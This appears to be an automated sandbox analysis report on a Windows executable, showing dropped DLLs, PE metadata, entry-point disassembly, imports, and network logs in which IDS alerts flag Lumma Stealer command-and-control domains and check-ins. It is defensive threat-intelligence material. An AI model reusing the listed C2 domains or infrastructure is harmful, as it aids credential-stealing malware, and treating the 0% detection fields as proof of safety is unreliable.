                                                                                                                    SHA-512:1C2372DEBC0E2E53EA281798F15243294430E4E7E4D3B82E4AB998A1B7C77CAD68D50E196E37C6FF7BA83B08A12286AF5D2797BFA707AF5DAD180862CCE7EFC7
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................x................q...................Rich...........PE..L...J:-a...........!......)...........).......)..............................pF.....?<E...@...........................?.......?.|.....C...............D.......C.0.....>.T.............................>.@.............)..............................text....).......)................. ..`.rdata...6....)..8....).............@..@.data.........@.......?.............@....rsrc.........C.......A.............@..@.reloc..0.....C.......A.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Users\user\Desktop\ceFgl3jkkk.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):25320
                                                                                                                    Entropy (8bit):6.533727727613444
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:KtbCEbBS3sEnqhrVusklI8mGgDG4yjshHZ:8bB4qNVusklI8mGsyjYZ
                                                                                                                    MD5:E03B622ACBA9D02DC5A10364824EDE8C
                                                                                                                    SHA1:40DB1A1A0D81C5D165D043502B1205B22BC238A4
                                                                                                                    SHA-256:DE914028BFDDF19EF7279F04C92EF118C59B1BA8B5E27C76A7932E086BBC7978
                                                                                                                    SHA-512:02ABE8C060A2E046E92DB4FDF5EFDEAF6A870703AD313D14D3E8A3A308CCA032C1D7B7AC40B0C346C0D8BF3193C42DFC69BF50450C9545D6BB6704FC0F5D3D5B
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............y..y..y......y...x..y...|..y...}..y...z..y.h.x..y...x..y..x...y.h.q..y.h.y..y.h...y.h.{..y.Rich.y.................PE..L...r:-a...........!.........&...............0.......................................9....@......................... ;..L...l;..x....`...............F.......p......d6..T............................6..@............0...............................text............................... ..`.rdata..6....0......."..............@..@.data........P.......6..............@....rsrc........`.......8..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Users\user\Desktop\ceFgl3jkkk.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1115880
                                                                                                                    Entropy (8bit):5.387181050869946
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:D13VQCb5Pfhnzr0ql9L8kUMmuZ63NKM7IRG5eeIDe6VZyrIBHdQLhfFE+Ck5t:D13jZV0m9suVMMREtIC6Vo4u8k5t
                                                                                                                    MD5:FED3EC3AE0C349D65C0E90025B5507E6
                                                                                                                    SHA1:3A1864A89C90D2837B77C6A1881263E9764FF8D3
                                                                                                                    SHA-256:CE67BBA9B38FC6023D8EFDB06223B823CEB5B7C316DA48EA1EC9E404D05384A4
                                                                                                                    SHA-512:87047F4B55C43D59FCD643879CC2CC6D03E18963E36D6C3F49AB37C8B8672B31F61ABD9AC1FAD732778FD02FB3D1E5308572C0297FB51E2FF7C8A26354C54C58
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.eb.f.1.f.1.f.1...1.f.1S..0.f.1S..0.f.1S..0.f.1S..0.f.1...0.f.1...0.f.1.f.1Ff.1...0.f.1...0.f.1...1.f.1...0.f.1Rich.f.1........PE..L...r:-a...........!.....H...........F.......`......................................e.....@.............................X...8...........................................T...........................p...@............`..4............................text...KF.......H.................. ..`.rdata..b~...`.......L..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.993255227216837
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:ceFgl3jkkk.exe
                                                                                                                    File size:7'166'290 bytes
                                                                                                                    MD5:9cf2fcabd10ee683a3652815014b368c
                                                                                                                    SHA1:f49914f1cf2b7fbba812eb8fd807b19065008b23
                                                                                                                    SHA256:857270428d9d88c5da6d8b9d33059d4e29347637879a17975631408c5359b623
                                                                                                                    SHA512:8dcf40e92d40627fb79413c6662e43e87d1dcd23e2825aa87a96e09706cff25e5e894376fdf5570d0e8470c36a4574810fc8afea3c720595fac07b93d0904117
                                                                                                                    SSDEEP:196608:e741InG5lNniIbZg4TYc1vR31A4zur5MOjjDDTTVCjE/gsOt0G1:e741ZbPH1AJCY/Ur
                                                                                                                    TLSH:2A763319DE51D061E5BB083014B0CB35ED7B6AB10B24847FB6C81DFA4E71AD0B4A6E9F
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pQ)j..)j..)j..=...%j..=....j..=...;j..O...-j..{....j..{...;j..{...;j..=..."j..)j...j......:j......(j..Rich)j.................
                                                                                                                    Icon Hash:27393d590b2f0f06
                                                                                                                    Entrypoint:0x40997c
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x670EBB30 [Tue Oct 15 18:57:52 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:1
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:1
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:1
                                                                                                                    Import Hash:bdaa4f11fa75ae7944b223ba584c1f57
                                                                                                                    Instruction
                                                                                                                    call 00007F3C107FCE45h
                                                                                                                    jmp 00007F3C107FC81Fh
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push 00000000h
                                                                                                                    call dword ptr [004230D8h]
                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                    call dword ptr [004230D4h]
                                                                                                                    push C0000409h
                                                                                                                    call dword ptr [0042309Ch]
                                                                                                                    push eax
                                                                                                                    call dword ptr [004230DCh]
                                                                                                                    pop ebp
                                                                                                                    ret
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    sub esp, 00000324h
                                                                                                                    push 00000017h
                                                                                                                    call dword ptr [004230E0h]
                                                                                                                    test eax, eax
                                                                                                                    je 00007F3C107FC9A7h
                                                                                                                    push 00000002h
                                                                                                                    pop ecx
                                                                                                                    int 29h
                                                                                                                    mov dword ptr [0043ED48h], eax
                                                                                                                    mov dword ptr [0043ED44h], ecx
                                                                                                                    mov dword ptr [0043ED40h], edx
                                                                                                                    mov dword ptr [0043ED3Ch], ebx
                                                                                                                    mov dword ptr [0043ED38h], esi
                                                                                                                    mov dword ptr [0043ED34h], edi
                                                                                                                    mov word ptr [0043ED60h], ss
                                                                                                                    mov word ptr [0043ED54h], cs
                                                                                                                    mov word ptr [0043ED30h], ds
                                                                                                                    mov word ptr [0043ED2Ch], es
                                                                                                                    mov word ptr [0043ED28h], fs
                                                                                                                    mov word ptr [0043ED24h], gs
                                                                                                                    pushfd
                                                                                                                    pop dword ptr [0043ED58h]
                                                                                                                    mov eax, dword ptr [ebp+00h]
                                                                                                                    mov dword ptr [0043ED4Ch], eax
                                                                                                                    mov eax, dword ptr [ebp+04h]
                                                                                                                    mov dword ptr [0043ED50h], eax
                                                                                                                    lea eax, dword ptr [ebp+08h]
                                                                                                                    mov dword ptr [0043ED5Ch], eax
                                                                                                                    mov eax, dword ptr [ebp-00000324h]
                                                                                                                    mov dword ptr [0043EC98h], 00010001h
                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2f35c0x78.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000x6280.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x470000x1afc.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x2e90c0x1c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2e9280x40.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x230000x1ec.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x212480x214003f1efcb5e498393bd3521b7da7842c97False0.5795788298872181MPEG-4 LOAS6.630648810716619IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x230000xcea80xd000b3e94a3575b62e3aad2f6189c023817eFalse0.5223294771634616data5.97383677665431IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0x300000xf8740xc00fa712c3d503d1593515a35e4bc75a27bFalse0.1318359375data1.67626223661243IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0x400000x62800x64006f8dd20db08fe009e3df837566485a74False0.4543359375data4.879978248372994IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0x470000x1afc0x1c003a6614674722dad462885b32e542d3cbFalse0.7931082589285714data6.57465318049585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0x403840x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0, resolution 2835 x 2835 px/mEnglishUnited States0.6854693140794224
                                                                                                                    RT_ICON0x40c2c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0, resolution 2835 x 2835 px/mEnglishUnited States0.5039868667917449
                                                                                                                    RT_ICON0x41cd40x568Device independent bitmap graphic, 16 x 32 x 8, image size 0, resolution 2835 x 2835 px/mEnglishUnited States0.5101156069364162
                                                                                                                    RT_ICON0x4223c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0, resolution 2835 x 2835 px/mEnglishUnited States0.6631205673758865
                                                                                                                    RT_ICON0x426a40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0, resolution 2835 x 2835 px/mEnglishUnited States0.4566390041493776
                                                                                                                    RT_STRING0x44c4c0x2f2data0.35543766578249336
                                                                                                                    RT_STRING0x44f400x30cdata0.3871794871794872
                                                                                                                    RT_STRING0x4524c0x2cedata0.42618384401114207
                                                                                                                    RT_STRING0x4551c0x68data0.75
                                                                                                                    RT_STRING0x455840xb4data0.6277777777777778
                                                                                                                    RT_STRING0x456380xaedata0.5344827586206896
                                                                                                                    RT_RCDATA0x456e80x2cdata1.2045454545454546
                                                                                                                    RT_GROUP_ICON0x457140x4cdataEnglishUnited States0.7894736842105263
                                                                                                                    RT_VERSION0x457600x4f4dataEnglishUnited States0.277602523659306
                                                                                                                    RT_MANIFEST0x45c540x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
                                                                                                                    DLLImport
                                                                                                                    USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongW, GetWindowLongW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                    COMCTL32.dll
                                                                                                                    KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, FlushFileBuffers, GetCurrentDirectoryW, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetEnvironmentStringsW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, GetCommandLineW, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, DecodePointer, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, RaiseException, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, SetStdHandle, SetConsoleCtrlHandler, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, CompareStringW, LCMapStringW
                                                                                                                    ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                    GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishUnited States
                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-11-21T13:45:22.256926+01002056570ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)1192.168.2.9579191.1.1.153UDP
                                                                                                                    2024-11-21T13:45:22.503700+01002056568ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)1192.168.2.9648951.1.1.153UDP
                                                                                                                    2024-11-21T13:45:22.773752+01002056566ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)1192.168.2.9610391.1.1.153UDP
                                                                                                                    2024-11-21T13:45:23.031762+01002056564ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)1192.168.2.9591111.1.1.153UDP
                                                                                                                    2024-11-21T13:45:23.292257+01002056562ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)1192.168.2.9536271.1.1.153UDP
                                                                                                                    2024-11-21T13:45:23.539228+01002056560ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)1192.168.2.9606021.1.1.153UDP
                                                                                                                    2024-11-21T13:45:23.786678+01002056558ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)1192.168.2.9493061.1.1.153UDP
                                                                                                                    2024-11-21T13:45:24.034227+01002056556ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)1192.168.2.9613841.1.1.153UDP
                                                                                                                    2024-11-21T13:45:26.060652+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949765104.102.49.254443TCP
                                                                                                                    2024-11-21T13:45:26.878290+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.949765104.102.49.254443TCP
                                                                                                                    2024-11-21T13:45:27.114029+01002057415ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com)1192.168.2.9631221.1.1.153UDP
                                                                                                                    2024-11-21T13:45:28.616606+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.949776188.114.97.3443TCP
                                                                                                                    2024-11-21T13:45:28.616606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949776188.114.97.3443TCP
                                                                                                                    2024-11-21T13:45:29.330441+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949776188.114.97.3443TCP
                                                                                                                    2024-11-21T13:45:29.330441+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949776188.114.97.3443TCP
                                                                                                                    2024-11-21T13:45:29.977517+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.949780188.114.97.3443TCP
                                                                                                                    2024-11-21T13:45:29.977517+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949780188.114.97.3443TCP
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 21, 2024 13:45:24.515242100 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:24.515281916 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:24.515763998 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:24.518544912 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:24.518553972 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.060585022 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.060652018 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:26.068897963 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:26.068924904 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.069195032 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.117918015 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:26.122486115 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:26.163336039 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.878411055 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.878463984 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.878480911 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:26.878495932 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.878508091 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.878525019 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.878540993 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:26.878555059 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:26.878556967 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.878604889 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:26.878604889 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:26.878607035 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:26.930429935 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:27.097150087 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:27.097162962 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:27.097188950 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:27.097212076 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:27.098473072 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:27.098473072 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:27.098493099 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:27.098746061 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:27.105298996 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:27.105727911 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:27.110918045 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:27.111236095 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:27.112019062 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:27.112019062 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:27.112019062 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:27.112369061 CET49765443192.168.2.9104.102.49.254
                                                                                                                    Nov 21, 2024 13:45:27.112380981 CET44349765104.102.49.254192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:27.351062059 CET49776443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:27.351098061 CET44349776188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:27.351341963 CET49776443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:27.351722002 CET49776443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:27.351743937 CET44349776188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:28.616449118 CET44349776188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:28.616605997 CET49776443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:28.618345022 CET49776443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:28.618355989 CET44349776188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:28.618606091 CET44349776188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:28.619815111 CET49776443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:28.619844913 CET49776443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:28.619899988 CET44349776188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:29.330446959 CET44349776188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:29.330547094 CET44349776188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:29.330702066 CET49776443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:29.330847979 CET49776443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:29.330862999 CET44349776188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:29.330939054 CET49776443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:29.330944061 CET44349776188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:29.389620066 CET49780443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:29.389658928 CET44349780188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:29.389746904 CET49780443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:29.390088081 CET49780443192.168.2.9188.114.97.3
                                                                                                                    Nov 21, 2024 13:45:29.390104055 CET44349780188.114.97.3192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:29.977516890 CET49780443192.168.2.9188.114.97.3
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 21, 2024 13:45:22.011275053 CET5550053192.168.2.91.1.1.1
                                                                                                                    Nov 21, 2024 13:45:22.253149033 CET53555001.1.1.1192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:22.256926060 CET5791953192.168.2.91.1.1.1
                                                                                                                    Nov 21, 2024 13:45:22.498781919 CET53579191.1.1.1192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:22.503700018 CET6489553192.168.2.91.1.1.1
                                                                                                                    Nov 21, 2024 13:45:22.744905949 CET53648951.1.1.1192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:22.773751974 CET6103953192.168.2.91.1.1.1
                                                                                                                    Nov 21, 2024 13:45:23.016148090 CET53610391.1.1.1192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:23.031761885 CET5911153192.168.2.91.1.1.1
                                                                                                                    Nov 21, 2024 13:45:23.274560928 CET53591111.1.1.1192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:23.292257071 CET5362753192.168.2.91.1.1.1
                                                                                                                    Nov 21, 2024 13:45:23.535934925 CET53536271.1.1.1192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:23.539227962 CET6060253192.168.2.91.1.1.1
                                                                                                                    Nov 21, 2024 13:45:23.783781052 CET53606021.1.1.1192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:23.786678076 CET4930653192.168.2.91.1.1.1
                                                                                                                    Nov 21, 2024 13:45:24.032608032 CET53493061.1.1.1192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:24.034226894 CET6138453192.168.2.91.1.1.1
                                                                                                                    Nov 21, 2024 13:45:24.278294086 CET53613841.1.1.1192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:24.281472921 CET5724053192.168.2.91.1.1.1
                                                                                                                    Nov 21, 2024 13:45:24.508641005 CET53572401.1.1.1192.168.2.9
                                                                                                                    Nov 21, 2024 13:45:27.114028931 CET6312253192.168.2.91.1.1.1
                                                                                                                    Nov 21, 2024 13:45:27.349638939 CET53631221.1.1.1192.168.2.9
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Nov 21, 2024 13:45:22.011275053 CET192.168.2.91.1.1.10xcdb9Standard query (0)droppyrelivei.cfdA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:22.256926060 CET192.168.2.91.1.1.10xc1cbStandard query (0)mathcucom.sbsA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:22.503700018 CET192.168.2.91.1.1.10x8738Standard query (0)allocatinow.sbsA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:22.773751974 CET192.168.2.91.1.1.10x83d6Standard query (0)enlargkiw.sbsA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:23.031761885 CET192.168.2.91.1.1.10x60fdStandard query (0)resinedyw.sbsA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:23.292257071 CET192.168.2.91.1.1.10x202bStandard query (0)vennurviot.sbsA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:23.539227962 CET192.168.2.91.1.1.10xf2d2Standard query (0)ehticsprocw.sbsA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:23.786678076 CET192.168.2.91.1.1.10x824aStandard query (0)condifendteu.sbsA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:24.034226894 CET192.168.2.91.1.1.10xbafcStandard query (0)drawwyobstacw.sbsA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:24.281472921 CET192.168.2.91.1.1.10xd211Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:27.114028931 CET192.168.2.91.1.1.10x99e4Standard query (0)marshal-zhukov.comA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Nov 21, 2024 13:44:59.116725922 CET1.1.1.1192.168.2.90x5269No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:44:59.116725922 CET1.1.1.1192.168.2.90x5269No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:22.253149033 CET1.1.1.1192.168.2.90xcdb9Name error (3)droppyrelivei.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:22.498781919 CET1.1.1.1192.168.2.90xc1cbName error (3)mathcucom.sbsnonenoneA (IP address)IN (0x0001)false
